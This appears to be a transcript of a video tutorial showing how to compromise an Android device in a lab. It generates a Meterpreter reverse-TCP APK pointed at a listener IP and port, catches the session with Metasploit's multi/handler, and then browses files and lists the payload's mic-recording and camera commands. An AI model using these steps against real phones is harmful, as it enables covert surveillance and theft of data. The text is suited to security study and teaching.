In this demonstration, we shall be seeing the basics of how an Android phone can be compromised using a malicious application. So, we shall be using Kali Linux over here. Let us open two terminals. So, the basic idea is to create a malicious application, and using which we will try to compromise the Android platform based device. So, first of all, let us open Metasploit console by typing in MSF console. And in the other terminal, let us create a payload or a malicious application. So the command is as such: msf payload android slash meterpreter slash reverse TCP, and then what we have to do is you can see on the other end that the Metasploit console has opened. And typing in lhost, the lhost will define the system where it will receive the connection after running the application. So just see the IP address for your Kali Linux machine. And one thing to mention here is you have to put this in bridged mode if you want to apply this particular demonstration in your own computer. So keeping the LOS as 192.168.1.5 and the L port as 4444, and after that that which means we are exporting the payload in a raw format and giving the name of that APK file which we shall create as new1.apk. The majority of Android phones nowadays are compromised with the help of malicious applications. These applications run amok because of improper checks during uploading or marketing this in the Google App Store. So, proper checks should be placed in order to prevent such attacks from taking place. So, after entering the command and pressing enter, you have to wait for some time. And you can see now the command has been completed. So closing this window and going on to places and traversing to the file system, then going on to the root folder, you can see that the new1.apk has been created. So this will be a malicious application which we shall install in an Android device and try to compromise it. Now you can see here I've created several malicious applications, but for the sake of this demonstration, I shall be using new1.apk. And here is the Metasploit console. So getting out of the virtual machine, what we can see here is this application new1.apk. The thing here to remember is you can either transport it via a USB thumb drive if you are transferring it from a virtual machine to the host machine, or you can install VMware tools in VMware workstation and then copy it and paste it over there. So looking at the properties, so you can see here that it is an APK file which is opened by a BlueStacks emulator. BlueStacks is a platform which is used to run Android applications in Windows. So coming back to Kali Linux, what we have to do is we have to use a particular exploit known as multi-handler, and we have to type in exploit slash multi slash handler over here, and we get access to the exploit panel. So typing exploit, so this handler is used to receive connections from external sources. So you can see here when you run this exploit, it is creating a reverse handler which is waiting for connections in Kali Linux. So now, coming back to our main machine, we have to double click this file. So double click on it, we can see that it is installing that APK in the BlueStacks emulator. a variety of Android emulators in the market. Apart from BlueStacks, you can go with the default Android SDK, which is provided free of cost by Google, which is the major platform on which Android applications are developed. So there you can use pretty much any emulator there is if you want to simulate this attack on a Windows computer. Apart from that, you can use Android device also if you want to check this whether this is working on an Android device or not. So you can transport this APK to that Android device and install it over there. And double clicking on it, we have to wait for some time until this connection is installed. In most Android devices, third-party applications are not supported as well as applications from Google Apps. So it is important that you have to first root the device. That will be required in some cases. And rooting the device can be done using guides provided in the internet. So once installed, this application will look something like this. So now you can send that. You can see that Kali Linux is sending a payload over to that application, or in fact, which is simulation of that Android device. So we shall be sending that payload and waiting for the connection to appear. This process will take some time, so it is important to be patient when this is open. Metasploit, it is important for us to know that this Android payload is, now you can see here that a Metasploit session has been opened. This particular attack is supported only by the latest version of Metasploit, that is Metasploit 4.8.2. So you have to update your Metasploit. So if you type in sysinfo, you can see that the OS is Linux 3.0.36 Android BST, and the interpreter is that Java interpreter. So if you type in help, you can see a list of the commands that can be executed by this shellcode. So typing in any command, so we traverse to the root directory of the Android device by typing cd slash and pressing ls. We can see that this is the directory. These are the file systems over there and the directories and the scripts in the Android device. So moving on to the external storage, cd sd card, typing ls again, we can see that we gain access to the folders which are present in the external storage device of the Android mobile. So in this way, you can get access to a variety of files and images and ringtones and everything. There are several other commands such as record mic and taking a snapshot from the cameras. And apart from that, you can view the list current processes which are running on the device, and get UID gives the current username of the user which is running that application. And here if you type in PS, you can see that all these are different processes which are running on the Android device along with different privileges like root system and the like. So this is all for the demonstration on Android mobile phone hack. So thank you.